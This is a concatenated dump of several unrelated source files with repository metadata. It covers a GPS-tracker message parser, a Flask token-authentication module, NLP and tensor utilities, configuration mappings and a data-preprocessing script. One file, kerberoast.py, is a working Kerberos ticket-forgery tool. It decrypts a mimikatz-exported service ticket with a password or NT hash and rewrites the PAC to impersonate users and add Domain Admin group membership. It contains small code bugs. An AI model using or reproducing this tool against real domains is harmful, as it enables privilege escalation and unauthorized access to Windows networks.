onoff = items[1].lower()
del items[1]
kvs = dict(map(lambda _: _.split(":"), items))
data['fence_enable'] = onoff
for k, v in kvs.items():
if k == 'FenceType':
data['fence_type'] = v.lower()
if k=='Latitude':
data['fence_cy'] = v
if k=='Longitude':
data['fence_cx'] = v
if k=='radius':
data['fence_radius'] = v[0:-1]
if k=='in out':
data['fence_inout'] = v
if k == 'alarm type':
data['fence_alarm_type'] = v
return data
class MessageOnlineCommandQuery(MessageOnlineCommand):
"""在线设备发送查询命令"""
Type = PacketType.OnlineCommandResponse
def __init__(self):
MessageOnlineCommand.__init__(self)
# class MessageOnlineCommandSet(MessageOnlineCommand):
# """在线设备发送设置命令"""
# Type = PacketType.OnlineCommandSet
# def __init__(self):
# MessageOnlineCommand.__init__(self)
class MessageAdjustTime(MessageBase):
"""校时包"""
Type = PacketType.AdjustTime
def __init__(self):
MessageBase.__init__(self)
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
now = datetime.datetime.now()
year = now.year - 2000
month = now.month
day = now.day
hour = now.hour
minute = now.minute
second = now.second
data = struct.pack('B'*6,year,month,day,hour,minute,second)
netpack.set_payload(data)
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageAdjustTime()
msg.extra = extra
return msg
class MessageGenericMessage(MessageBase):
"""信息传输通用包"""
Type = PacketType.GenericMessage
def __init__(self):
MessageBase.__init__(self)
self.type = 0 # 信息类型
self.content = '' # 信息内容 文本AT指令风格
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
import base64
buf = ByteBuf(bytes)
msg = MessageGenericMessage()
msg.extra = extra
msg.type = buf.read_uint8()
msg.content = buf.bytes[buf.index:]
if msg.type == 4: # 终端状态同步信息 ascii
pass
else: # 转成 base64
msg.content = base64.b64encode(msg.content)
return msg
class MessageAddressCNResp(MessageBase):
""""""
Type = PacketType.AddressCNResp
def __init__(self):
MessageBase.__init__(self)
self.size = 0
self.sequence = 0
self.alarmsms = 'X'*8
self.address = ''
self.tel = '0'*21
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageAddressCNResp()
msg.extra = extra
return msg
def marshall(self):
buf = ByteBuf()
self.size = 39 + len(self.address)
buf.write_uint8(self.size)
buf.write_uint32(self.sequence)
buf.write_bytes(self.alarmsms)
buf.write_bytes('&&')
buf.write_bytes(self.address)
buf.write_bytes('&&')
buf.write_bytes(self.tel)
buf.write_bytes('##')
return buf.bytes
class MessageAddressENResp(MessageAddressCNResp):
""""""
Type = PacketType.AddressENResp
def __init__(self):
MessageAddressCNResp.__init__(self)
def registerMessageObject(msgcls):
MessageClsDict[msgcls.Type.value] = msgcls
# print globals().keys()
for key,value in locals().items():
if key.find('Message')==0 and key not in ('MessageClsDict','MessageBase'):
registerMessageObject(value)
# print MessageClsDict.values()
# @singleton
# class MessageOnlineCommandAllocator(object):
# def __init__(self):
# self.seq_gen = None
#
# def setSequenceGeneroator(self,generator):
# self.seq_gen = generator
#
# def createCommand(self):
# cmd = MessageOnlineCommand(self.seq_gen.next())
# return cmd
| 28.273715
| 86
| 0.57764
|
5955113d24d812160700b32a80d74653750634d2
| 10,128
|
py
|
Python
|
src/pyinfraboxutils/ibflask.py
|
sap-coutantm/InfraBox
|
462b7aca3c730148c5ced6c9fffaa6b3172d1399
|
[
"Apache-2.0"
] | null | null | null |
src/pyinfraboxutils/ibflask.py
|
sap-coutantm/InfraBox
|
462b7aca3c730148c5ced6c9fffaa6b3172d1399
|
[
"Apache-2.0"
] | null | null | null |
src/pyinfraboxutils/ibflask.py
|
sap-coutantm/InfraBox
|
462b7aca3c730148c5ced6c9fffaa6b3172d1399
|
[
"Apache-2.0"
] | null | null | null |
import base64
from functools import wraps
from flask import Flask, g, jsonify, request, abort
from pyinfraboxutils import get_logger
from pyinfraboxutils.db import DB, connect_db
from pyinfraboxutils.token import decode
app = Flask(__name__)
app.url_map.strict_slashes = False
logger = get_logger('ibflask')
def get_token():
auth = dict(request.headers).get('Authorization', None)
cookie = request.cookies.get('token', None)
if auth:
if auth.startswith("Basic "):
auth = auth.split(" ")[1]
try:
decoded = base64.b64decode(auth)
except:
logger.warn('could not base64 decode auth header')
abort(401, 'Unauthorized')
s = decoded.split('infrabox:')
if len(s) != 2:
logger.warn('Invalid auth header format')
abort(401, 'Unauthorized')
try:
token = decode(s[1])
except Exception as e:
logger.exception(e)
abort(401, 'Unauthorized')
return token
elif auth.startswith("token ") or auth.startswith("bearer "):
token = auth.split(" ")[1]
try:
token = decode(token.encode('utf8'))
except Exception as e:
logger.exception(e)
abort(401, 'Unauthorized')
return token
else:
logger.warn('Invalid auth header format')
abort(401, 'Unauthorized')
elif cookie:
token = cookie
try:
token = decode(token.encode('utf8'))
except Exception as e:
logger.exception(e)
abort(401, 'Unauthorized')
return token
else:
logger.info('No auth header')
abort(401, 'Unauthorized')
try:
#pylint: disable=ungrouped-imports,wrong-import-position
from pyinfraboxutils import dbpool
logger.info('Using DB Pool')
@app.before_request
def before_request():
g.db = dbpool.get()
def release_db():
db = getattr(g, 'db', None)
if not db:
return
dbpool.put(db)
g.db = None
g.release_db = release_db
except:
@app.before_request
def before_request():
g.db = DB(connect_db())
def release_db():
db = getattr(g, 'db', None)
if not db:
return
db.close()
g.db = None
g.release_db = release_db
@app.teardown_request
def teardown_request(_):
try:
release_db = getattr(g, 'release_db', None)
if release_db:
release_db()
except Exception as e:
logger.error(_)
logger.exception(e)
@app.errorhandler(404)
def not_found(error):
msg = error.description
if not msg:
msg = 'Not Found'
return jsonify({'message': msg, 'status': 404}), 404
@app.errorhandler(401)
def unauthorized(error):
return jsonify({'message': error.description, 'status': 401}), 401
@app.errorhandler(400)
def bad_request(error):
return jsonify({'message': error.description, 'status': 400}), 400
def OK(message, data=None):
d = {'message': message, 'status': 200}
if data:
d['data'] = data
return jsonify(d)
def token_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
g.token = get_token()
return f(*args, **kwargs)
return decorated_function
def check_job_belongs_to_project(f):
@wraps(f)
def decorated_function(*args, **kwargs):
project_id = kwargs.get('project_id')
job_id = kwargs.get('job_id')
assert project_id
assert job_id
r = g.db.execute_one('''
SELECT id
FROM job
WHERE id = %s AND project_id = %s
''', [job_id, project_id])
if not r:
logger.debug('job does not belong to project')
abort(404)
return f(*args, **kwargs)
return decorated_function
def job_token_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
token = get_token()
if token['type'] != 'job':
logger.warn('token type is not job but "%s"', token['type'])
abort(401, 'Unauthorized')
job_id = token['job']['id']
r = g.db.execute_one('''
SELECT state, project_id, name
FROM job
WHERE id = %s''', [job_id])
if not r:
logger.warn('job not found')
abort(401, 'Unauthorized')
job_state = r[0]
if job_state not in ('queued', 'running', 'scheduled'):
abort(401, 'Unauthorized')
token['job']['state'] = r[0]
token['job']['name'] = r[2]
token['project'] = {}
token['project']['id'] = r[1]
g.token = token
return f(*args, **kwargs)
return decorated_function
def validate_job_token(token):
job_id = token['job']['id']
r = g.db.execute_one('''
SELECT state, project_id, name
FROM job
WHERE id = %s''', [job_id])
if not r:
logger.warn('job not found')
abort(401, 'Unauthorized')
job_state = r[0]
if job_state not in ('queued', 'running', 'scheduled'):
abort(401, 'Unauthorized')
token['job']['state'] = r[0]
token['job']['name'] = r[2]
token['project'] = {}
token['project']['id'] = r[1]
g.token = token
def is_collaborator(user_id, project_id, db=None):
if not db:
db = g.db
u = db.execute_many('''
SELECT co.*
FROM collaborator co
INNER JOIN "user" u
ON u.id = co.user_id
AND u.id = %s
AND co.project_id = %s
''', [user_id, project_id])
return u
def is_public(project_id, project_name):
if project_id:
p = g.db.execute_one_dict('''
SELECT public
FROM project
WHERE id = %s
''', [project_id])
if not p:
abort(404, 'Project not found')
if p['public']:
return True
elif project_name:
p = g.db.execute_one_dict('''
SELECT public
FROM project
WHERE name = %s
''', [project_name])
if not p:
abort(404, 'Project not found')
if p['public']:
return True
else:
logger.warn('no project_id or project_name')
abort(401, 'Unauthorized')
return False
def validate_user_token(token, check_project_access, project_id, check_project_owner):
u = g.db.execute_one('''
SELECT id FROM "user" WHERE id = %s
''', [token['user']['id']])
if not u:
logger.warn('user not found')
abort(401, 'Unauthorized')
if check_project_access:
if not project_id:
logger.warn('no project id')
abort(401, 'Unauthorized')
u = is_collaborator(token['user']['id'], project_id)
if not u:
logger.warn('user has no access to project')
abort(401, 'Unauthorized')
if check_project_owner:
if not project_id:
logger.warn('no project id')
abort(401, 'Unauthorized')
u = g.db.execute_many('''
SELECT co.*
FROM collaborator co
INNER JOIN "user" u
ON u.id = co.user_id
AND u.id = %s
AND co.project_id = %s
AND co.owner = true
''', [token['user']['id'], project_id])
if not u:
logger.warn('user has no access to project')
abort(401, 'Unauthorized')
def validate_project_token(token, check_project_access, project_id):
if not check_project_access:
return
if project_id != token['project']['id']:
logger.warn('token not valid for project')
abort(401, 'Unauthorized')
def auth_required(types,
check_project_access=True,
check_project_owner=False,
check_admin=False,
allow_if_public=False):
def actual_decorator(f):
@wraps(f)
def decorated_function(*args, **kwargs):
project_id = kwargs.get('project_id', None)
project_name = kwargs.get('project_name', None)
if allow_if_public:
if is_public(project_id, project_name):
return f(*args, **kwargs)
token = get_token()
token_type = token['type']
g.token = token
if token_type == 'project-token':
token_type = 'project'
if token_type not in types:
logger.warn('token type "%s" not allowed here', token_type)
abort(401, 'Unauthorized')
if token_type == 'job':
if check_project_owner:
logger.warn('Project owner validation not possible with job token')
abort(401, 'Unauthorized')
validate_job_token(token)
elif token_type == 'user':
if token['user']['id'] != '00000000-0000-0000-0000-000000000000':
if check_admin:
abort(401, 'Unauthorized')
else:
validate_user_token(token,
check_project_access,
project_id,
check_project_owner)
elif token_type == 'project':
project_id = kwargs.get('project_id')
if check_project_owner:
logger.warn('Project owner validation not possible with project token')
abort(401, 'Unauthorized')
validate_project_token(token, check_project_access, project_id)
else:
logger.warn('unhandled token type')
abort(401, 'Unauthorized')
return f(*args, **kwargs)
return decorated_function
return actual_decorator
| 27.008
| 91
| 0.535742
|
8c4b3a23d177c060b7d7bce971e075d62cca6a82
| 10,091
|
py
|
Python
|
kerberoast.py
|
bbhunter/kerberoast
|
e983ba1d5290e94c71e04fc15dc2cee482873f18
|
[
"Apache-2.0"
] | 1,011
|
2015-03-17T21:52:07.000Z
|
2022-03-31T09:25:41.000Z
|
kerberoast.py
|
bbhunter/kerberoast
|
e983ba1d5290e94c71e04fc15dc2cee482873f18
|
[
"Apache-2.0"
] | 16
|
2015-07-08T09:12:27.000Z
|
2022-03-05T19:04:26.000Z
|
kerberoast.py
|
bbhunter/kerberoast
|
e983ba1d5290e94c71e04fc15dc2cee482873f18
|
[
"Apache-2.0"
] | 274
|
2015-04-28T21:24:23.000Z
|
2022-03-29T18:37:27.000Z
|
#!/usr/bin/env python3 -tt
import kerberos
from pyasn1.codec.ber import encoder, decoder
from pyasn1.type import univ, useful
import struct
import datetime
import re
import pac
def walk(t):
if type(t) == str:
print('String: %s' % t)
else:
print('Length: %i' % len(t))
for i in range(len(t)):
print('---%i---' % i)
print(t[i])
#Sequence().setComponentByPosition(0, BitString("'01000000101000010000000000000000'B")).setComponentByPosition(1, Sequence().setComponentByPosition(0, Integer(23)).setComponentByPosition(1, OctetString(hexValue='dfa121845d72f43271bbb33cd9e69443'))).setComponentByPosition(2, GeneralString('MEDIN.LOCAL')).setComponentByPosition(3, Sequence().setComponentByPosition(0, Integer(1)).setComponentByPosition(1, Sequence().setComponentByPosition(0, GeneralString('tm')))).setComponentByPosition(4, Sequence().setComponentByPosition(0, Integer(1)).setComponentByPosition(1, OctetString(''))).setComponentByPosition(5, GeneralizedTime('20140403172846Z')).setComponentByPosition(6, GeneralizedTime('20140403173119Z'))
def updatetimestampsserverticket(ticket, authtime=None, starttime=None, endtime=None, renewtiltime=None):
now = datetime.datetime.now()
# yes, this regex isn't perfect, but neither are you
if not authtime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', authtime):
authtime = now.strftime('%Y%m%d%H%M%SZ')
if not starttime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', starttime):
starttime = now.strftime('%Y%m%d%H%M%SZ')
if not endtime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', endtime):
endtime = (now + datetime.timedelta(hours=10)).strftime('%Y%m%d%H%M%SZ')
if not renewtiltime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', renewtiltime):
renewtiltime = (now + datetime.timedelta(hours=24)).strftime('%Y%m%d%H%M%SZ')
# Dear, pyasn1
# Why do I have to use a _ method to update a value. You expect me to write
# an entire spec, I don't want to. Because of this I HATE YOU. Please
# DIAF
# -Tim
# P.S. Suck it
ticket.getComponentByPosition(5)._value = useful.GeneralizedTime(authtime)
ticket.getComponentByPosition(6)._value = useful.GeneralizedTime(starttime)
ticket.getComponentByPosition(7)._value = useful.GeneralizedTime(endtime)
ticket.getComponentByPosition(8)._value = useful.GeneralizedTime(renewtiltime)
return ticket
def addgrouptopac(pac, grouprid):
version, numentries, pactype, pacsize, offset = struct.unpack('<IIIII', pac[:20])
pac_logon_info = pac[offset:offset+pacsize]
return pac
def updateusernameinencpart(key, rawticket, username, debug=False, verbose=False):
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print('Ticket succesfully decoded')
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
a = decoder.decode(decserverticketraw)[0]
a[3][1][0]._value = username
e = encoder.encode(a)
newencserverticket = kerberos.encrypt(key, 2, e, nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
return ramticket
def getpac(key, rawticket, debug=False, verbose=False):
# attempt decoding of ticket
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print('Ticket succesfully decoded')
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
if decserverticketraw == None:
raise ValueError('Unable to decrypt ticket. Invalid key.')
elif verbose:
print('Decryption successful')
decserverticket, extra = decoder.decode(decserverticketraw)
# have two here because I was using one to verify that the rewrite matched
# This stuff should be removed, if it is still here Tim forgot...again
origdecserverticket, extra = decoder.decode(decserverticketraw)
# change the validity times in the server ticket
updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
pac = str(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
return pac
def updatepac(key, rawticket, pac, debug=False, verbose=False):
# attempt decoding of ticket
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print('Ticket succesfully decoded')
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
if decserverticketraw == None:
raise ValueError('Unable to decrypt ticket. Invalid key.')
elif verbose:
print('Decryption successful')
decserverticket, extra = decoder.decode(decserverticketraw)
#for i in range(len(decserverticket[3])):
# print '---%i---' % i
# print decserverticket[3][i]
# have two here because I was using one to verify that the rewrite matched
# This stuff should be removed, if it is still here Tim forgot...again
origdecserverticket, extra = decoder.decode(decserverticketraw)
# change the validity times in the server ticket
updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
#print 'newchecksum: %s' % chksum.encode('hex')
# repair server checksum
newpac = pac[:-44] + chksum + pac[-28:]
# rebuild AD-IF-RELEVANT
#print adifrelevant
#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
#print adifrelevant
decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
# put the ticket back together again
newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
#print decserverticket
return encoder.encode(ramticket)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Read kerberos ticket then modify it')
parser.add_argument('-r', '--readfile', dest='infile', action='store', required=True,
metavar='INFILE.kirbi', type=argparse.FileType('rb'),
help='the file containing the kerberos ticket exported with mimikatz')
parser.add_argument('-w', '--outputfile', dest='outfile', action='store', required=True,
metavar='OUTFILE.kirbi', type=argparse.FileType('wb'),
help='the output file, wite hash for john the ripper to crack')
parser.add_argument('-p', '--password', dest='password', action='store', required=False,
metavar='P@ss0rd1', type=str,
help='the password used to decrypt/encrypt the ticket')
parser.add_argument('-t', '--nthash', dest='nthash', action='store', required=False,
metavar='64F12CDDAA88057E06A81B54E73B949B', type=str,
help='the hashed password used to decrypt/encrypt the ticket')
parser.add_argument('-g', '--group', dest='groups', action='append', required=False,
metavar='512', type=int,
help='group rid to add (512 is Domain Admin)')
parser.add_argument('-u', '--user', dest='userrid', action='store', required=False,
metavar='500', type=int,
help='user rid to impersonate')
parser.add_argument('-n', '--username', dest='username', action='store', required=False,
metavar='yomom', type=str,
help='user name to impersonate')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False,
default=False,
help='verbose')
parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False,
default=False,
help='show debug messages')
#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2,
# metavar='2', type=int,
# help='message type, from RAM it is 2 (This should not need to be changed)')
args = parser.parse_args()
# make sure a password or hash is provided
if args.nthash == None and args.password != None:
key = kerberos.ntlmhash(args.password)
elif args.nthash != None:
key = args.nthash.decode('hex')
else:
print("You must provide either the password (-p) or the hash (-n)")
exit(1)
# read the ticket from the file
fullraw = args.infile.read()
args.infile.close()
# do the rewrite
#newticket = rewriteticket(key, fullraw, debug=args.debug, verbose=args.verbose)
pac = getpac(key, fullraw)
pacobj = PAC.PAC(pac)
# change user rid
if args.userrid:
pacobj.PacLoginInfo.UserRid = args.userrid
# append groups
if args.groups:
for g in args.groups:
if g not in pacobj.PacLoginInfo.Groups:
pacobj.PacLoginInfo.Groups.append(g)
if args.username:
pacobj.PacLoginInfo.AccountName = args.username.encode('utf-16le')
pacobj.PacLoginInfo.DisplayName = args.username.encode('utf-16le')
pac = pacobj.encode()
newticket = updatepac(key, fullraw, pac)
if args.username:
updateusernameinencpart(key, newticket, args.username)
args.outfile.write(newticket)
args.outfile.close()
| 39.417969
| 708
| 0.742543
|
2dbfc933985e66e4bb63e063ad6bbec4b9455b0c
| 542
|
py
|
Python
|
spacy_lookups_data/tests/test_da.py
|
spacy-pl/spacy-lookups-data
|
54ed95b020a7b0f15df8f872346211d39edf5053
|
[
"MIT"
] | null | null | null |
spacy_lookups_data/tests/test_da.py
|
spacy-pl/spacy-lookups-data
|
54ed95b020a7b0f15df8f872346211d39edf5053
|
[
"MIT"
] | null | null | null |
spacy_lookups_data/tests/test_da.py
|
spacy-pl/spacy-lookups-data
|
54ed95b020a7b0f15df8f872346211d39edf5053
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from __future__ import unicode_literals
from spacy.lang.da import Danish
import pytest
@pytest.fixture(scope="session")
def da_nlp():
return Danish()
@pytest.mark.parametrize(
"string,lemma",
[
("affaldsgruppernes", "affaldsgruppe"),
("detailhandelsstrukturernes", "detailhandelsstruktur"),
("kolesterols", "kolesterol"),
("åsyns", "åsyn"),
],
)
def test_da_lemmatizer_lookup_assigns(da_nlp, string, lemma):
tokens = da_nlp(string)
assert tokens[0].lemma_ == lemma
| 21.68
| 64
| 0.673432
|
eba8756b67074da1fe9b580934d4a01057d5a496
| 3,885
|
py
|
Python
|
gorilla/utils/typing.py
|
sunjiahao1999/gorilla-core
|
bf43e3a49c7f79834ae969db38edd50f17ef5288
|
[
"MIT"
] | 4
|
2021-07-28T04:50:26.000Z
|
2021-09-23T12:59:01.000Z
|
gorilla/utils/typing.py
|
sunjiahao1999/gorilla-core
|
bf43e3a49c7f79834ae969db38edd50f17ef5288
|
[
"MIT"
] | null | null | null |
gorilla/utils/typing.py
|
sunjiahao1999/gorilla-core
|
bf43e3a49c7f79834ae969db38edd50f17ef5288
|
[
"MIT"
] | 2
|
2021-08-05T04:01:12.000Z
|
2021-12-25T02:17:03.000Z
|
# Copyright (c) Gorilla-Lab. All rights reserved.
import functools
import torch
import numpy as np
def type_assert(arg):
r"""Assert type in [`list`, `tuple`, `np.array`, `torch.Tensor`]
Args:
arg (instance): instance to be asserted its type
"""
type_flag = isinstance(arg, list) or \
isinstance(arg, tuple) or \
isinstance(arg, np.ndarray) or \
isinstance(arg, torch.Tensor)
assert type_flag, (f"args type {type(arg[0])} not in "
f"[`list`, `tuple`, `np.ndarray`, `torch.Tensor`]")
def convert_into_torch_tensor(array) -> torch.Tensor:
r"""Convert other type array into torch.Tensor
Args:
array (list | tuple | obj:`ndarray` | obj:`Tensor`): Input array
Returns:
torch.Tensor: Processed array
"""
type_assert(array)
if not isinstance(array, torch.Tensor):
array = torch.Tensor(array)
array = array.squeeze().float()
return array
def convert_into_nparray(array, dtype=np.float32) -> np.array:
r"""Convert other type array into np.array
Args:
array (list | tuple | obj:`ndarray` | obj:`Tensor`): Input array
Returns:
torch.Tensor: Processed array
"""
type_assert(array)
if not isinstance(array, np.ndarray):
array = np.array(array)
array = array.squeeze().astype(dtype)
return array
def _replace(arg, type="numpy"):
assert type in ["numpy", "torch"]
# np.ndarray -> torch.Tensor
if isinstance(arg, np.ndarray) and type == "torch":
arg = torch.from_numpy(arg)
# torch.Tensor -> np.ndarray
elif isinstance(arg, torch.Tensor) and type == "numpy":
if arg.requires_grad:
arg = arg.detach()
arg = arg.cpu().numpy()
# keep origin type
else:
pass
return arg
def auto_type(type):
r"""Author: Liang.Zhihao
automatically convert the 'np.ndarray' and 'torch.Tensor' according to type
Args:
type (str): 'numpy' or 'torch'
Example:
>>> # numpy auto convert
>>> @gorilla.auto_type("numpy")
>>> def test(a, b, c):
>>> print(f"a: {type(a)}, b: {type(b)}, c: {type(c)}")
>>> test(torch.randn(3), np.ones(3), [1, 1, 1])
a: <class 'numpy.ndarray'>, b: <class 'numpy.ndarray'>, c: <class 'list'>
>>> # torch auto convert
>>> @gorilla.auto_type("torch")
>>> def test(a, b, c):
>>> print(f"a: {type(a)}, b: {type(b)}, c: {type(c)}")
>>> test(torch.randn(3), np.ones(3), [1, 1, 1])
a: <class 'torch.Tensor'>, b: <class 'torch.Tensor'>, c: <class 'list'>
>>> # specify arguments
>>> test(torch.randn(3), c=np.ones(3), b=[1, 1, 1])
a: <class 'torch.Tensor'>, b: <class 'list'>, c: <class 'torch.Tensor'>
"""
assert type in ["numpy",
"torch"], f"must be 'numpy' or 'torch', but got {type}"
def actual_decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
replace_args = []
replace_kwargs = {}
for arg in args:
replace_args.append(_replace(arg, type))
for key, arg in kwargs.items():
replace_kwargs[key] = _replace(arg, type)
return func(*replace_args, **replace_kwargs)
return wrapper
return actual_decorator
def to_float32(arr: np.ndarray) -> np.ndarray:
r"""Author: lei.jiabao
process float16 array specially
Args:
arr (np.ndarray): the origin array
Returns:
np.ndarray: array as float32
"""
if arr.dtype == np.float16:
return arr.astype(
np.float32) + 1e-4 * np.random.randn(*arr.shape).astype(np.float32)
elif arr.dtype == np.float32:
return arr
else:
return arr.astype(np.float32)
| 29.884615
| 81
| 0.566281
|
9ee361202b76ca761e174ea96c99ba6b5b3d5d45
| 1,152
|
py
|
Python
|
PROJECTS/p002/PSEF_SCRIPTS/host_to_type.py
|
nihole/PSEFABRIC
|
366461ab86f99665bf310425c6ce05a216343ec9
|
[
"Apache-2.0",
"MIT"
] | 11
|
2017-06-29T10:12:39.000Z
|
2020-03-12T07:19:11.000Z
|
PROJECTS/p002/PSEF_SCRIPTS/host_to_type.py
|
nihole/PSEFABRIC
|
366461ab86f99665bf310425c6ce05a216343ec9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
PROJECTS/p002/PSEF_SCRIPTS/host_to_type.py
|
nihole/PSEFABRIC
|
366461ab86f99665bf310425c6ce05a216343ec9
|
[
"Apache-2.0",
"MIT"
] | 3
|
2019-04-18T06:44:21.000Z
|
2021-06-26T14:22:55.000Z
|
'''
Adminstrator has to describe the equipment of psefabric.
The mult_cfg.py script uses these dicts in the deciding of how to process the data.
'''
def host_to_type():
host = {}
host['panorama'] = 'pa_panorama'
host['apic_aci_dc1'] = 'cisco_aci'
host['apic_aci_dc2'] = 'cisco_aci'
return host
def area_to_eq_aci():
map_apic_host = {}
map_apic_host['dc1'] = 'apic_aci_dc1'
map_apic_host['dc2'] = 'apic_aci_dc2'
map_aci_tenant = {}
map_aci_tenant['dc1'] = {}
map_aci_tenant['dc2'] = {}
map_aci_tenant['dc1']['a1'] = 't1'
map_aci_tenant['dc1']['a2'] = 't2'
map_aci_tenant['dc2']['a1'] = 't1'
map_aci_tenant['dc2']['a2'] = 't2'
return (map_apic_host, map_aci_tenant)
def area_to_eq_pa():
'''
Maps areas to panorama device-groups
'''
map_pa_device_group = {}
map_pa_device_group['dc1'] = {}
map_pa_device_group['dc2'] = {}
map_pa_device_group['dc1']['a1'] = 'dc1_a1'
map_pa_device_group['dc1']['a2'] = 'dc1_a2'
map_pa_device_group['dc2']['a1'] = 'dc2_a1'
map_pa_device_group['dc2']['a2'] = 'dc2_a2'
return map_pa_device_group
| 25.6
| 83
| 0.627604
|
543998b5b0c3c7044d68988512771905d81f22f8
| 344
|
py
|
Python
|
users/filters.py
|
projeto-cascata/portal-cascata-dev
|
bffdd0f29fdad25d4c8cf5a2d563e41e621dc205
|
[
"MIT"
] | 2
|
2018-04-10T14:13:46.000Z
|
2018-12-05T00:19:17.000Z
|
users/filters.py
|
projeto-cascata/portal-cascata-dev
|
bffdd0f29fdad25d4c8cf5a2d563e41e621dc205
|
[
"MIT"
] | 26
|
2018-04-04T00:50:13.000Z
|
2018-05-20T18:02:34.000Z
|
users/filters.py
|
projeto-cascata/portal-cascata-dev
|
bffdd0f29fdad25d4c8cf5a2d563e41e621dc205
|
[
"MIT"
] | null | null | null |
from .models import Member
from .models import Student
import django_filters
class MemberFilter(django_filters.FilterSet):
class Meta:
model = Member
fields = ['first_name', 'last_name', ]
class StudentFilter(django_filters.FilterSet):
class Meta:
model = Student
fields = ['first_name', 'last_name', ]
| 26.461538
| 46
| 0.688953
|
454e8c1f6dbee85ecdf95027c9775f765e88d5c0
| 4,546
|
py
|
Python
|
generate_training_data.py
|
boreshkinai/fc-gaga
|
0f6bcf0ce97f23ad331fc6725eaaec0d59051a61
|
[
"MIT"
] | 25
|
2020-12-10T02:16:30.000Z
|
2022-01-01T11:16:22.000Z
|
generate_training_data.py
|
safarzadeh-reza/fc-gaga
|
0f6bcf0ce97f23ad331fc6725eaaec0d59051a61
|
[
"MIT"
] | 1
|
2021-11-01T21:23:20.000Z
|
2022-02-06T19:32:50.000Z
|
generate_training_data.py
|
safarzadeh-reza/fc-gaga
|
0f6bcf0ce97f23ad331fc6725eaaec0d59051a61
|
[
"MIT"
] | 5
|
2021-08-12T16:53:27.000Z
|
2022-02-11T18:25:59.000Z
|
import argparse
import numpy as np
import os
import pandas as pd
def generate_graph_seq2seq_io_data(
df, x_offsets, y_offsets, add_time_in_day=False, add_day_in_week=False, scaler=None
):
"""
Generate samples from
:param df:
:param x_offsets:
:param y_offsets:
:param add_time_in_day:
:param add_day_in_week:
:param scaler:
:return:
# x: (epoch_size, input_length, num_nodes, input_dim)
# y: (epoch_size, output_length, num_nodes, output_dim)
"""
num_samples, num_nodes = df.shape
data = np.expand_dims(df.values, axis=-1)
data_list = [data]
if add_time_in_day:
time_ind = (df.index.values - df.index.values.astype("datetime64[D]")) / np.timedelta64(1, "D")
time_in_day = np.tile(time_ind, [1, num_nodes, 1]).transpose((2, 1, 0))
data_list.append(time_in_day)
if add_day_in_week:
day_in_week = np.zeros(shape=(num_samples, num_nodes, 7))
day_in_week[np.arange(num_samples), :, df.index.dayofweek] = 1
data_list.append(day_in_week)
data = np.concatenate(data_list, axis=-1)
# epoch_len = num_samples + min(x_offsets) - max(y_offsets)
x, y = [], []
# t is the index of the last observation.
min_t = abs(min(x_offsets))
max_t = abs(num_samples - abs(max(y_offsets))) # Exclusive
for t in range(min_t, max_t):
x_t = data[t + x_offsets, ...]
y_t = data[t + y_offsets, ...]
x.append(x_t)
y.append(y_t)
x = np.stack(x, axis=0)
y = np.stack(y, axis=0)
return x, y
def generate_train_val_test(args):
df = pd.read_hdf(args.traffic_df_filename)
zero_mask = (df > 0).astype(np.float32)
